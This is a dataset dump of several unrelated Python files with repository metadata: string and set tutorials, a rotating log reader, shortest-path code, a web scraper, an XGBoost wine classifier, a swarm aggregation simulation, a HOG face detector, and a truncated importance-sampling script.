blob_id stringlengths 40 40 | language stringclasses 1
value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30
values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2
values | text stringlengths 12 5.47M | download_success bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
4bd4c1a663b4d6bfb5284cc9bcae0b774631c1dc | Python | LoliSensei/python_practica | /3-trabajando_strings.py | UTF-8 | 1,494 | 4.875 | 5 | [] | no_license | "|Asi se declaran los caracteres/cadenas|"
nombres = "Cristian"
"|Los saltos de linea se dan usando '\n'|"
print(nombres + "\n" + "Tomat")
"""|Para imprimir cualquier tipo de caracter especial
utilizamos \ y seguido el caracter|"""
print("\"Ni que fuera chiquito\"")
"|Funcion para imprimir todas las letreas minusculas|"
"Estructura: nombre_de_la_variable.lower()"
print(nombres.lower())
"|Funcion para imprimir todas las letreas MAYUSCULAS|"
"Estructura: nombre_de_la_variable.upper()"
print(nombres.upper())
"""|Funcion para comprobar si la palabra esta en
minusculas (retorna un valor boolean)|
"""
"Estructura: nombre_de_la_variable.islower()"
print(nombres.islower())
"""|Funcion para comprobar si la palabra esta en
MAYSCULAS (retorna un valor boolean)|
"""
"Estructura: nombre_de_la_variable.isupper()"
print(nombres.isupper())
"""|Funcion para contar el numero de caracteres
de una cadena|
"""
"Estructura: len(nombre_de_variable)"
print(len(nombres))
"|Acceder a caracteres especificos de una cadena|"
"Estructura: nombre_de_variable[numero_caracter]"
print(nombres[0])
"""|Funcion para buscar la posicion inicial
de un caracter o palabra especifica dentro de un
string o cadena|
"""
"Estructura: nombre_de_la_variable.index(Busqueda)"
print(nombres.index("r"))
"""|Funcion para remplazar una parte del string
con un nuevo caracter o cadena especificado|
"""
"""Estructura:
nombre_de_la_variable.replace("antiguo","nuevo")"""
print(nombres.replace("tian","topher"))
| true |
ccc9a97f80781141afcbaed18601277cb10d6fa2 | Python | llxmilan/dv | /nstc_etl_tool/utils/rotatingfile.py | UTF-8 | 9,950 | 2.578125 | 3 | [] | no_license | #coding=utf-8
import sys, os
import time, datetime
import re
printf = lambda s:sys.stderr.write('%s\n' % s)
class RotatingFile(object):
DEFAULT_OFFSET_FILE = '%(perfix)soffset'
def __init__(self, pattern):
self.pattern = pattern
self._pattern = self.parse_pattern(pattern)
self._file = None
def __enter__(self):
return self
def __exit__(self, *exc_info):
if self._file and not isinstance(self._file, str):
self._file.close()
@property
def file(self):
if not hasattr(self._file, 'readlines'):
if self._file is None:
raise LookupError, "Do seek before read files"
printf("open file %s" % self._file)
self._file = open(self._file, 'rb')
return self._file
def tell(self):
return self._file.name, self.offset
@property
def offset(self):
return self._file.tell()
def seek(self, filename, offset):
#补齐路径
path, basename = os.path.split(filename)
if not path:
filename = os.path.join(self._pattern['path'], filename)
pattern = self._split_pattern(filename)
if self._check_pattern(pattern):
self._file = filename
self.file.seek(offset)
self._nextfile = None
def seek_first_match(self):
pass
@property
def default_offsetfile(self):
return os.path.join(self._pattern['path'], self.DEFAULT_OFFSET_FILE % self._pattern)
def seek_fromfile(self, offsetfile = None):
offsetfile = offsetfile or self.default_offsetfile
#printf(offsetfile)
if not os.path.exists(offsetfile):
return False
with open(offsetfile) as f:
s = f.readline()
#todo: check s
filename, _, offset = s.strip().partition(' ')
if not offset.isalnum():
printf('Invalid offset' + repr(s))
return False
printf("Seek from file %s (%s %s)" % (offsetfile, filename, int(offset)))
self.seek(filename, int(offset))
return True
def save_offset(self, offsetfile = None):
offsetfile = offsetfile or self.default_offsetfile
current = self.file.name
if not is_thesame_path(current, offsetfile):
current = os.path.abspath(current)
else:
current = os.path.basename(current)
printf("Offset saved into %s (%s %s)" % (offsetfile, current, self.offset))
open(offsetfile, 'w').write("%s %s" % (current, self.offset))
def readline(self):
l = self.file.readline()
if not l:
self.rollover()
l = self.file.readline()
return l
def __iter__(self):
f = self.file
while 1:
l = f.readline()
if l:
yield l
elif self.rollover():
f = self.file
else:
break
def outputlines(self, lines, output = sys.stdout.write):
f = self.file
linecount = 0
while linecount < lines:
l = f.readline()
if l:
output(l)
linecount += 1
elif self.rollover():
f = self.file
else:
break
def output(self, output = sys.stdout.write):
f = self.file
while 1:
l = f.readline()
if l:
output(l)
elif self.rollover():
f = self.file
else:
break
def rollover(self):
if not self._nextfile:
self._nextfile = os.path.join(self._pattern['path'], self.compute_rollover())
if os.path.exists(self._nextfile):
self._file.close()
self._file = self._nextfile
self._nextfile = None
return True
else:
printf("Failed in rolling over, exit now")
return False
def compute_rollover(self):
"""To be overrided"""
raise NotImplementedError
def _check_pattern(self, pattern):
if not pattern:
return False
if not is_thesame_path(pattern['path'], self._pattern['path']):
raise IOError, "'%s' must in the same directory with %s" \
% (pattern['path'], self._pattern['path'])
if pattern['perfix'] != self._pattern['perfix']:
raise TypeError, "'%s' has different perfix with pattern '%s'" \
% (pattern['perfix'], self._pattern['perfix'])
return True
class NumericRotatingFile(RotatingFile):
PATTERN_FORMAT = r'(.*?)(0+)$'
ROTATING_FORMAT = r'(.*?)(\d{%d})$'
def __init__(self, pattern):
super(NumericRotatingFile, self).__init__(pattern)
def parse_pattern(self, pattern):
path, pattern = os.path.split(pattern)
parts = re.compile(self.PATTERN_FORMAT).findall(pattern)
if not parts:
raise SyntaxError, "'%s' is not a correct numeric rotating file pattern" % pattern
perfix, zeros = parts[0]
pattern = {
'path': path,
'perfix': perfix,
'zeros': len(zeros),
}
return pattern
def _split_pattern(self, filename):
path, pattern = os.path.split(filename)
parts = re.compile(self.ROTATING_FORMAT % self._pattern['zeros']).findall(pattern)
if not parts:
raise TypeError, filename
perfix, num = parts[0]
pattern = {
'path': path,
'perfix': perfix,
'num': int(num),
}
return pattern
def _check_pattern(self, pattern):
return super(NumericRotatingFile, self)._check_pattern(pattern)
def compute_rollover(self):
pattern = self._split_pattern(self._file.name)
num = str(pattern['num'] + 1).zfill(self._pattern['zeros'])
if len(num) > self._pattern['zeros']:
raise IndexError, "%s%s is out of pattern %s" % (perfix, num, self.pattern)
return pattern['perfix'] + num
class TimedRotatingFile(RotatingFile):
PATTERN_FORMAT = r'(.*)\{(.*)\}$'
def __init__(self, pattern):
super(TimedRotatingFile, self).__init__(pattern)
def compute_rollover(self):
pattern = self._split_pattern(self._file.name)
newtime = dateadd(pattern['time'], **{self._pattern['resolution'] : 1})
newfile = datetime.datetime.strftime(newtime, self._pattern['format'])
if newfile == os.path.basename(self._file.name):
raise IndexError, "%s%s is out of pattern %s" % (perfix, num, self.pattern)
return newfile
def parse_pattern(self, pattern):
path, pattern = os.path.split(pattern)
parts = re.compile(self.PATTERN_FORMAT).findall(pattern)
if not parts:
raise SyntaxError, "'%s' is not a correct numeric rotating file pattern" % pattern
perfix, timeformat = parts[0]
pattern = {
'path': path,
'perfix': perfix,
'format': perfix + timeformat,
'resolution': get_resolution(timeformat) + 's',
}
return pattern
def _split_pattern(self, filename):
path, pattern = os.path.split(filename)
try:
dt = datetime.datetime.strptime(pattern, self._pattern['format'])
except ValueError:
raise TypeError, "%s" % filename
parts = pattern.split(self._pattern['perfix'])
if len(parts) == 1 or parts[0] != '':
raise TypeError, "%s" % filename
pattern = {
'path': path,
'perfix': self._pattern['perfix'],
'time': dt,
}
return pattern
def _check_pattern(self, pattern):
return super(TimedRotatingFile, self)._check_pattern(pattern)
def is_thesame_path(filea, fileb):
patha = os.path.dirname(os.path.abspath(filea))
pathb = os.path.dirname(os.path.abspath(fileb))
return patha == pathb
def get_resolution(timeformat):
"""找出一个时间格式字符串的时间精度
比如:
get_resolution('%Y-%m-%d %H') #return 'hour'
get_resolution('%Y%m') #return 'month'
"""
dt = datetime.datetime
test_time = dt.fromtimestamp(1320981071) # '2011-11-11 11:11:11'
deg_str = dt.strftime(test_time, timeformat)
deg_time = dt.strptime(deg_str, timeformat)
timeunit = ['second', 'minute', 'hour', 'day', 'month', 'year']
for u in timeunit:
if getattr(deg_time, u) > 1:
return u
def dateadd(dt, **kwargs):
"""日期加法
给定datetime对象dt
接受参数years,months,days,hours,minutes,seconds
例子:
d = datetime.datetime(2011, 10, 9)
dateadd(d, years = 1, months = 2, days = 20)
#return datetime.datetime(2012, 12, 21)
"""
month = dt.month + int(kwargs.pop('months', 0))
year = int(kwargs.pop('years', 0)) + month / 12 - (month % 12 == 0)
month = month % 12 or 12
newdate = dt.replace(year = dt.year + year, month = month)
return newdate + datetime.timedelta(**kwargs)
def Open(**kwargs):
pass
if __name__ == "__main__":
import getopt
optionlist = ['help', 'seek-from-file=', 'start=', 'offset=', 'rotating-pattern=', 'type=', 'no-auto-save']
try:
opts, argv = getopt.getopt(sys.argv[1:], "hfn:p:s:o:t:", optionlist)
except getopt.GetoptError, err:
printf(err)
sys.exit(2)
args = {}
for o, arg in opts:
# print 'parsing %s:%s' % (o, arg)
if o in ('-n'):
args['lines'] = int(arg)
elif o in ('-p', '--rotating-pattern'):
args['pattern'] = arg
elif o in ('-t', '--type'):
args['type'] = arg
elif o in ('-s', '--start'):
args['start'] = arg
elif o in ('-o', '--offset'):
args['offset'] = int(arg)
elif o in ('-f'):
args['use_default_offsetfile'] = True
elif o in ('--seek-from-file'):
args['offsetfile'] = arg
elif o in ('--no-auto-save'):
args['no-auto-save'] = True
elif o in ('-h', '--help'):
pass
# printf(args)
# printf(argv)
pattern = args.get('pattern')
if not pattern:
printf("Please specify a rotating file pattern")
exit(1)
type_mapping = {
'num': NumericRotatingFile,
'numeric': NumericRotatingFile,
'time': TimedRotatingFile,
}
rotating_handler = type_mapping.get(args.get('type'))
if not rotating_handler:
printf("Rotating type missing or incorrect.")
exit(2)
# f = rotating_handler(pattern)
with rotating_handler(pattern) as f:
offsetfile = args.get('offsetfile')
if args.get('offsetfile') or args.get('use_default_offsetfile'):
f.seek_fromfile()
else:
start, offset = args.get('start'), args.get('offset', 0)
if not start:
printf("Set start file and it's offset or specify an offset file")
exit(3)
f.seek(start, offset)
lines = args.get('lines')
if lines is None:
f.output()
else:
f.outputlines(lines)
if not args.get('no-auto-save'):
f.save_offset(offsetfile) | true |
bb3ba04a2eb8aafd7ba4f4e60ba6867392f20b3b | Python | chloro4m/python_practice_codes | /all_pairs_shortest_path_alternate_implement.py | UTF-8 | 2,989 | 3.671875 | 4 | [] | no_license | # All Pairs Shortest Path Implementation
import sys
# key are vertices; each edge has weight and that's encoded as well
graph = {0: {1: 2, 4:4},
1: {2:3},
2: {3:5, 4:1 },
3: {0: 8},
4: {3:3}}
def allPairsShortestPath(g):
"""Return distance structure as computed"""
#dist+pred will be dicts (key:vtx, val:dict->KEY:toVtx, VAL:dist/pred)
dist = {}
pred = {}
#for all vertices, create dict values with vertex as key
for u in g:
dist[u] = {}
pred[u] = {}
#for all vertices, set init. dist+pred to all vertices, including self
for v in g:
dist[u][v] = sys.maxsize
pred[u][v] = None
#finish off init with obvious dist and pred to self as 0 and None
dist[u][u] = 0
pred[u][u] = None
#for all vertices in graph for current vertex u, set obvious..
#..neighboring direct dist and pred
for v in g[u]:
dist[u][v] = g[u][v]
pred[u][v] = u
#this is the heavy lifting to figure out...
for mid in g:
for u in g:
for v in g:
newlen = dist[u][mid] + dist[mid][v]
if newlen < dist[u][v]:
dist[u][v] = newlen
pred[u][v] = pred[mid][v]
return (dist,pred)
def constructShortestPath(s, t, pred):
"""Reconstruct shortest path from s to t using information in pred"""
path = [t]
while t != s:
t = pred[s][t]
if t is None:
return None
path.insert(0, t)
return path
##That is, graph is a dictionary whose keys are the vertices and the value is itself
##a dictionary of vertex : weight pairs. Thus in the above representation, there
##are two edges emanating from vertex 0: (0,1) and (0,4). Edge (0,1) has a weight
##of 2 while edge (0,4) has a weight of 4.
##
##With such a graph, invoke allPairsShortestPath and be prepared to receive a
##dist and pred matrix containing the solution
##
## >>> dist, pred = allPairsShortestPath(graph)
##
##The dist structure is a two-dimensional dictionary whose value dist[i][j] represents
##the minimum cost of any path between vertices i and j. pred[i][j] represents the
##previous vertex to use when traversing the shortest path from vertex i to j. To
##recover the solutions, invoke following:
##
## >>> constructShortestPath(s, t, pred)
##
##where s and t are vertices in the graph and pred is the structure returned by
##allPairseShortestPath
#random example of dynamic programming:
past_fib = {}
def fibonacci(n):
"""Return nth fibonacci number memorizing past solutions"""
if n in past_fib:
return past_fib[n]
if n == 0 or n == 1:
past_fib[n] = 1
return 1
total = fibonacci(n-1) + fibonacci(n-2)
past_fib[n] = total
return total
| true |
eb54855cdfe1ae53efee4203a7703ba9c78015fc | Python | jxie0755/Learning_Python | /StandardLibrary/learn_set_operation.py | UTF-8 | 7,702 | 4.15625 | 4 | [] | no_license | """
set operation
https://docs.python.org/3/library/stdtypes.html#set-types-set-frozenset
"""
print("class set([iterable]))")
print("class frozenset([iterable])")
# Set 包含两个,一个是set,一个是frozenset.
# 集合对象是一个由互不相同的hashable对象组成的无序集合
# 它与tuple或者list非常类似,但是最大区别就是无序且不允许出现重复元素. 常见的使用包括成员测试, 从序列中删除重复项和计算数学运算(如交, 并, 差和对称差)
# 因此,集合支持x in set, len(set)以及for x in set
# 但作为一个无序的集合, 集合不记录元素位置和插入顺序. 因此, 集合不支持索引, 切片, 或其它类似于序列的行为
# set 类型是可变的 - 可以使用add()和remove()方法来更改内容. 因为它是可变的, 所以它没有哈希值(not hashable)且不能用作字典的键或另一个集合的元素.
# frozenset 类型是不可变的, hashable - 其内容创建后不能更改: 它因此可以用作字典键或作为另一个集合的元素
# create a set
# use set() to create from a list or a tuple
lst = [1,2,5,3,3,3,4,5]
tup = (1,3,3,5,7,7,9)
tup2 = ("a", "s", "d", "f")
print(set(lst)) # >>> {1, 2, 3, 4, 5}
print(set(tup)) # >>> {1, 3, 5, 7, 9} # numbers sequence not showed random, but stll no sequence
print(set(tup2)) # >>> {"b", "a", "d", "c"} # string sequence showed random (no sequence)
# from dict, create a set of keys or values.
dic = {"a": 1, "b": 3, "c": 3, "d": 2}
print(set(dic)) # >>> {"a", "b", "c"}
print(set(dic.values())) # >>> {1, 2, 3}
# create from using {} directly for NON-EMPTY set
set1 = {4,5,6}; print(set1) # >>> {4, 5, 6}
set2 = {4,5,5,6}; print(set2) # >>> {4, 5, 6} # still filter the repeating
# create empty set
emptset = set([])
print(emptset) # >>> set()
# create frozenset
# frozenset是冻结的集合, 它是不可变的, 存在哈希值, 好处是它可以作为字典的key, 也可以作为其它集合的元素.
# 基本相同,但是不能直接使用{}
print(frozenset(lst)) # >>> frozenset({1, 2, 3, 4, 5})
print(frozenset(tup)) # >>> frozenset({1, 3, 5, 7, 9})
print(frozenset(tup2)) # >>> frozenset({"s", "d", "a", "f"})
# there is no point to create empty frozenset, but you still can
emptfset = frozenset([])
print(emptfset) # >>> frozenset()
# 一旦创建便不能更改, 没有add, remove方法.
a = [0, 1, 1, 1, 2, 3, 3, 4]
fst = frozenset(a)
# fst.add(9) AttributeError: "frozenset" object has no attribute "add"
# fst.remove(4) AttributeError: "frozenset" object has no attribute "remove"
# 作为字典的key frozenset can be used as key of a dictionary (the whole set)
adict = {fst:1, "b":2} # works
# bdict = {st:1, "b":2} # TypeError: unhashable type: "set"
# basic attributes and operation
a = [0, 1, 1, 1, 2, 3, 3, 4, "foo", "bar"]
st = set(a) # >>> {0, 1, 2, 3, 4, "foo", "bar"}
fst = frozenset(a) # >>> frozenset({0, 1, 2, 3, 4, "foo", "bar"})
print(len(st)) # >>> 7
print(2 in st, "bar" not in st) # >>> True False
st1 = {1,2,3}
st2 = {1, 2, "c"}
print(st1.isdisjoint(st2)) # >>> False
print(emptset.isdisjoint(emptfset)) # >>> True # for two empty set
# 如果该集合中任何一个元素都与另一个集合other中的任何一个元素都不一样(即两集合不相交), 则返回True.
# 当且仅当两集合的交集为空集时, 这两个集合不相交
# create a copy
st1 = {1,2,3}
st2 = st1.copy()
print(st2) # >>> {1, 2, 3}
# subset
st1 = {1,2,3}
st2 = {4,1,5,2,6,3}
st3 = {3,2,1}
print(st1.issubset(st2)) # >>> True
print(st1.issubset(st3)) # >>> True # even two sets are identical.
print(st1 <= st3) # >>> True # same function
print(st1 < st3) # >>> False # 判断真子集 (proper subset)
# superset
print(st2.issuperset(st1)) # >>> True
print(st2 >= st1) # >>> True
print(st3 > st1) # >>> False # 判断真超集 (proper superset)
# 逻辑运算
st1 = {1,2,3,4}
st2 = {3,4,5,6}
st3 = {4,5,6,7}
# union(other, ...)
# set | other | ...
# 并集
print(st1.union(st2, st3)) # >>> {1, 2, 3, 4, 5, 6, 7}
print(st1 | st2 | st3) # >>> {1, 2, 3, 4, 5, 6, 7}
# intersection(other, ...)
# set & other & ...
# 交集
print(st1.intersection(st2, st3)) # >>> {4}
print(st1 & st2 & st3) # >>> {4}
# difference(*others)
# set - other - ...
# 差集
print(st1.difference(st2, st3)) # >>> {1, 2} # items in st1 but not in st2 and st3
print(st1 - st2 - st3) # >>> {1, 2} # same
print({1,2,3} - {1,2,3,4}) # >>> set() # 子集-超集=空集
# symmetric_difference(other)
# set ^ other
# 对称差集
# 返回一个新的集合, 元素在集合或other中, 但不能在两个集合中都存在.
print(st1.symmetric_difference(st2)) # >>> {1, 2, 5, 6}
print(st1 ^ st2) # >>> {1, 2, 5, 6}
# other comparisons:
# frozenset基于其成员的实例与实例的set进行比较
st = set([1,2,3]) # >>> {0, 1, 2, 3, 4, "foo", "bar"}
fst = frozenset([1,2,3,4,5]) # >>> frozenset({0, 1, 2, 3, 4, "foo", "bar"})
print(st == fst) # >>> False
print(st >= fst) # >>> False
print(st <= fst) # >>> True
# frozenset混合set实例的二元运算返回第一个操作数的类型.
print(st | fst) # >>> {1, 2, 3, 4, 5}
print(fst | st) # >>> frozenset({1, 2, 3, 4, 5})
print(st.symmetric_difference(fst)) # >>> {4, 5}
print(fst.symmetric_difference(st)) # >>> frozenset({4, 5})
# 下表列出的操作可用于set但不可用于不可变的frozenset
# update(other, ...)
# set |= other | ...
# 更新的设置, 添加从所有其他的元素.
st1 = {1,2,3,4}
st2 = {"a", "b", "c", "d"}
st1.update([9], [10]) # must be interable, numbers can not be directly added
print(st1) # >>> {1, 2, 3, 4, 9, 10}
st2.update("x y z", "lol")
print(st2) # >>> {"c", "l", "a", "b", "d", "x", " ", "z", "y", "o"} # 注意这里不是单独添加一个"x y z"和"lol"
st1 |= {10, 11, 13} # one at a time
print(st1) # >>> {1, 2, 3, 4, 9, 10, 11, 13}
# intersection_update(other, ...)
# set &= other & ...
# 更新集合,只保留集合与其他集合的交集
st1 = {1,2,3,4}
st2 = {3,4,5,6}
st1.intersection_update(st2)
print(st1) # >>> {3, 4} # 更改st1, 而不是新创一个交集
# difference_update(other, ...)
# set -= other | ...
# 更新集合, 发现在其他元素中删除
st1 = {1,2,3,4}
st2 = {3,4,5,6}
st1.difference_update(st2)
print(st1) # >>> {1, 2}
# symmetric_difference_update(other)
# set ^= other
# 更新集, 保持只发现在任一组中, 但不是在两个的元素
st1 = {1,2,3,4}
st2 = {3,4,5,6}
st1.symmetric_difference_update(st2)
print(st1) # >>> {1, 2, 5, 6}
# add(elem)
# 添加元素elem到集合.
st1 = {1,2,3,4}
st1.add(9)
print(st1) # >>> {1, 2, 3, 4, 9}
# remove(elem)
# 从集合中移除元素elem, 如果elem不包含在集合中, 提出了KeyError
st1 = {1,2,3,4}
st1.remove(3)
print(st1) # >>> {1, 2, 4}
# st1.remove(8) # 引发KeyError
# discard(elem)
# 从集合中移除元素elem, 如果它存在
st1 = {1,2,3,4}
st1.discard(8) # 不引发KeyError
st1.discard(1)
print(st1) # >>> {2, 3, 4}
# pop()
# 从集合中移除并返回任意元素. 如果此集合为空, 则引发KeyError
st1 = {4,2,1,3}
st2 = {"a", "b", "c", "d"}
st1.pop() # 不能添加index
st1.pop()
print(st1) # >>> {3, 4} # 似乎数字set的pop()是从最小的数字开始pop?
# The reason it says it is arbitrary is because there is no guarantee about the ordering it will pop out.
# STOF: https://stackoverflow.com/q/9848693/8435726
st2.pop()
print(st2) # >>> {"a", "c", "d"} # string set 更随机
# clear()
# 从集合中移除所有元素.
st1 = {4,2,1,3}
st1.clear()
print(st1) # >>> set()
| true |
a1156b74ce40094ed4c6ddc3d6157e284b8bc18a | Python | ponymoon/python-sect2 | /과제3.py | UTF-8 | 652 | 2.640625 | 3 | [] | no_license | from bs4 import BeautifulSoup
import urllib.request as req
import sys
import io
sys.stdout = io.TextIOWrapper(sys.stdout.detach(), encoding = 'utf-8')
sys.stderr = io.TextIOWrapper(sys.stderr.detach(), encoding = 'utf-8')
url = "https://www.daum.net"
res = req.urlopen(url).read().decode(req.urlopen(url).headers.get_content_charset()) #euc-kr 쓰므로 'euc-kr'이라해도 된다
soup = BeautifulSoup(res,"html.parser")
list_10 = soup.find_all("a", tabindex="-1")
for i,k in enumerate(list_10,1):
print(i,'.','검색어 :', k.string,'link주소 :', k.attrs['href'])
#ol.list_hotissue issue_row list_mini
#span.txt_issue
#for k in list_10:
| true |
78ba51c2f1cc15327af69883584bede8f4c36e95 | Python | catacristea/ThinkPython | /100 - Problems/Day10/6.py | UTF-8 | 351 | 4.125 | 4 | [] | no_license | '''
Question 36
Question:
Define a function which can generate a list where the values are square of numbers between 1 and 20 (both included).
Then the function needs to print all values except the first 5 elements in the list.
'''
def list_generator():
l = [i**2 for i in range(1,21)]
print(l[5:])
list_generator() | true |
184f326d608b112cb06ef915ecb35aa23edfc749 | Python | andresgr96/Agent-Based-Covid-Simulation | /experiments/aggregation/aggregation.py | UTF-8 | 5,528 | 2.5625 | 3 | [] | no_license |
from experiments.aggregation.cockroach import Cockroach
from experiments.aggregation.config import config
from simulation.utils import *
from simulation.swarm import Swarm
import numpy as np
import pygame
from typing import Tuple
from simulation.agent import Agent
from simulation.utils import normalize, truncate
experiment = "stage3"
class Aggregations(Swarm):
def init(self, screen_size) -> None:
super(Swarm, self).init(screen_size)
def initialize(self, num_agents: int) -> None:
"""
Initialize the whole swarm, creating and adding the obstacle objects, and the agent, placing them inside of the
screen and avoiding the obstacles.
:param num_agents: int:
"""
object_loc_main = config["base"]["object_location"]
if experiment == "stage2.0":
self.objects.add_object(file = "experiments/flocking/images/redd.png", pos = object_loc_main, scale = [800, 800], obj_type = "obstacle")
object_loc = config["first_circle"]["object_location"]
self.objects.add_object(
file="experiments/aggregation/images/greyc1.png", pos=object_loc, scale=[200, 200], obj_type="site"
)
object_loc = config["second_circle"]["object_location"]
self.objects.add_object(
file="experiments/aggregation/images/greyc1.png", pos=object_loc, scale=[200, 200], obj_type="site"
)
elif experiment == "stage1":
self.objects.add_object(file="experiments/flocking/images/redd.png", pos=object_loc_main, scale=[800, 800],
obj_type="obstacle")
object_loc = config["center_circle"]["object_location"]
self.objects.add_object(
file="experiments/aggregation/images/greyc1.png", pos=object_loc, scale=[200, 200], obj_type="site"
)
elif experiment == "stage2.1":
self.objects.add_object(file="experiments/flocking/images/redd.png", pos=object_loc_main, scale=[800, 800],
obj_type="obstacle")
object_loc = config["first_circle"]["object_location"]
self.objects.add_object(
file="experiments/aggregation/images/greyc1.png", pos=object_loc, scale=[200, 200], obj_type="site"
)
object_loc = config["second_circle"]["object_location"]
self.objects.add_object(
file="experiments/aggregation/images/greyc2.png", pos=object_loc, scale=[225, 225], obj_type="site"
)
elif experiment == "stage3":
self.objects.add_object(file="experiments/flocking/images/redd.png", pos=object_loc_main, scale=[1000, 1000],
obj_type="obstacle")
object_loc = config["first_circle"]["object_location"]
self.objects.add_object(
file="experiments/aggregation/images/greyc1.png", pos=object_loc, scale=[200, 200], obj_type="site"
)
object_loc = config["second_circle"]["object_location"]
self.objects.add_object(
file="experiments/aggregation/images/greyc1.png", pos=object_loc, scale=[200, 200], obj_type="site"
)
object_loc = config["upper_circle"]["object_location"]
self.objects.add_object(
file="experiments/aggregation/images/greyc1.png", pos=object_loc, scale=[200, 200], obj_type="site"
)
object_loc = config["lower_circle"]["object_location"]
self.objects.add_object(
file="experiments/aggregation/images/greyc1.png", pos=object_loc, scale=[200, 200], obj_type="site"
)
elif experiment == "stage3.1":
self.objects.add_object(file="experiments/flocking/images/redd.png", pos=object_loc_main, scale=[800, 800],
obj_type="obstacle")
object_loc = config["first_circle"]["object_location"]
self.objects.add_object(
file="experiments/aggregation/images/greyc1.png", pos=object_loc, scale=[200, 200], obj_type="site"
)
object_loc = config["second_circle"]["object_location"]
self.objects.add_object(
file="experiments/aggregation/images/greyc1.png", pos=object_loc, scale=[200, 200], obj_type="site"
)
object_loc = config["upper_circle"]["object_location"]
self.objects.add_object(
file="experiments/aggregation/images/greyc2.png", pos=object_loc, scale=[225, 225], obj_type="site"
)
object_loc = config["lower_circle"]["object_location"]
self.objects.add_object(
file="experiments/aggregation/images/greyc2.png", pos=object_loc, scale=[225, 225], obj_type="site")
min_x, max_x = area(object_loc_main[0], 1000)
min_y, max_y = area(object_loc_main[1], 1000)
# add agents to the environment
for index, agent in enumerate(range(num_agents)):
coordinates = generate_coordinates(self.screen)
while (
coordinates[0] >= max_x
or coordinates[0] <= min_x
or coordinates[1] >= max_y
or coordinates[1] <= min_y
):
coordinates = generate_coordinates(self.screen)
self.add_agent(Cockroach(pos=np.array(coordinates), v=None, cockroach=self, index=index))
| true |
43cce93464ea311bc20abd0efb34a0bf519c276f | Python | wxl789/python | /day13/04-通过实例对象去修改类属性.py | UTF-8 | 326 | 3.40625 | 3 | [] | no_license |
class People(object):
address = "杭州"#类属性
#通过实例对象去修改类属性
print(People.address)
#创建实例对象
p = People()
print(p.address)
#直接方式
p.address = "北京"
print(p.address)
print(People.address)
del p.address
print(p.address)
People.address = "北京"
print(p.address)
| true |
a5f9904bf61e431e57abe225424f211a3d34822e | Python | saTan-Y/Machine-Learning | /xgboost/xgboost_wine_data.py | UTF-8 | 1,260 | 2.890625 | 3 | [] | no_license | #!/usr/bin/python
# -*- coding:utf-8 -*-
import time
import numpy as np
import pandas as pd
from sklearn.linear_model import LogisticRegression
import xgboost as xgb
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
if __name__ == '__main__':
t0 = time.time()
df = pd.read_csv('14.wine.data', dtype=float, header=None)
df[0] = df[0].map({1.0: 0, 2.0: 1, 3.0: 2}).astype(int)
x, y = df.values[:, 1:], df.values[:, 0]
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.5, random_state=1)
lr = LogisticRegression(penalty='l2')
lr.fit(x_train, y_train.ravel())
y_pred1 = lr.predict(x_test)
rate1 = accuracy_score(y_test, y_pred1)
train_data = xgb.DMatrix(x_train, label=y_train)
test_data = xgb.DMatrix(x_test, label=y_test)
params = {'max_depth': 2, 'eta':0.2, 'silent': 0, 'objective':'multi:softmax', 'num_class': 3}
watch_list = [(test_data, 'eval'), (train_data, 'train')]
bst = xgb.train(params, train_data, num_boost_round=10, evals=watch_list)
y_pred2 = bst.predict(test_data)
rate2 = accuracy_score(y_test, y_pred2)
print('lr rate', rate1)
print('xgboost rate', rate2)
print('Elapsed time is', time.time()-t0)
| true |
54185f21e09dfb5be50c2c1798b33f20937b924f | Python | BungPeerapat/face_detector | /object_detector/detector.py | UTF-8 | 2,916 | 2.78125 | 3 | [
"MIT"
] | permissive | import numpy as np
import cv2
from sklearn.externals import joblib
from . import MODEL_PATH
from skimage.feature import hog
from .utils import sliding_window, pyramid, non_max_suppression, rgb2gray
class Detector:
def __init__(self, downscale=1.5, window_size=(178, 218), window_step_size=20, threshold=0.4):
self.clf = joblib.load(MODEL_PATH)
self.downscale = downscale
self.window_size = window_size
self.window_step_size = window_step_size
self.threshold = threshold
def detect(self, image):
clone = image.copy()
image = rgb2gray(image)
# list to store the detections
detections = []
# current scale of the image
downscale_power = 0
# downscale the image and iterate
for im_scaled in pyramid(image, downscale=self.downscale, min_size=self.window_size):
# if the width or height of the scaled image is less than
# the width or height of the window, then end the iterations
if im_scaled.shape[0] < self.window_size[1] or im_scaled.shape[1] < self.window_size[0]:
break
for (x, y, im_window) in sliding_window(im_scaled, self.window_step_size,
self.window_size):
if im_window.shape[0] != self.window_size[1] or im_window.shape[1] != self.window_size[0]:
continue
# calculate the HOG features
feature_vector = hog(im_window)
X = np.array([feature_vector])
prediction = self.clf.predict(X)
if prediction == 1:
x1 = int(x * (self.downscale ** downscale_power))
y1 = int(y * (self.downscale ** downscale_power))
detections.append((x1, y1,
x1 + int(self.window_size[0] * (
self.downscale ** downscale_power)),
y1 + int(self.window_size[1] * (
self.downscale ** downscale_power))))
# Move the the next scale
downscale_power += 1
# Display the results before performing NMS
clone_before_nms = clone.copy()
for (x1, y1, x2, y2) in detections:
# Draw the detections
cv2.rectangle(clone_before_nms, (x1, y1), (x2, y2), (0, 255, 0), thickness=2)
# Perform Non Maxima Suppression
detections = non_max_suppression(np.array(detections), self.threshold)
clone_after_nms = clone
# Display the results after performing NMS
for (x1, y1, x2, y2) in detections:
# Draw the detections
cv2.rectangle(clone_after_nms, (x1, y1), (x2, y2), (0, 255, 0), thickness=2)
return clone_before_nms, clone_after_nms
| true |
728b0e1eb025f88d217ed1a495f2799fade3b459 | Python | tcompa/scripts | /python/importance_sampling.py | UTF-8 | 996 | 3.53125 | 4 | [] | no_license | #!/usr/bin/python
'''
program: importance_sampling.py
created: 2015-09-09 -- 18 CEST
author: tc
notes: takes samples from the probability distribution Q(x), and computes
average observables for the probability distribution P(x)
'''
import numpy
def obs(a):
'''
An observable.
'''
return a ** 2
def P(a):
'''
Gaussian distribution with sigma=1
'''
s = 1.0
return numpy.exp(- 0.5 * (a / s) ** 2) / numpy.sqrt(2.0 * numpy.pi) / s
def Q(a):
'''
Gaussian distribution with sigma=2
'''
s = 2.0
return numpy.exp(- 0.5 * (a / s) ** 2) / numpy.sqrt(2.0 * numpy.pi) / s
N = 10000000 # number of samples
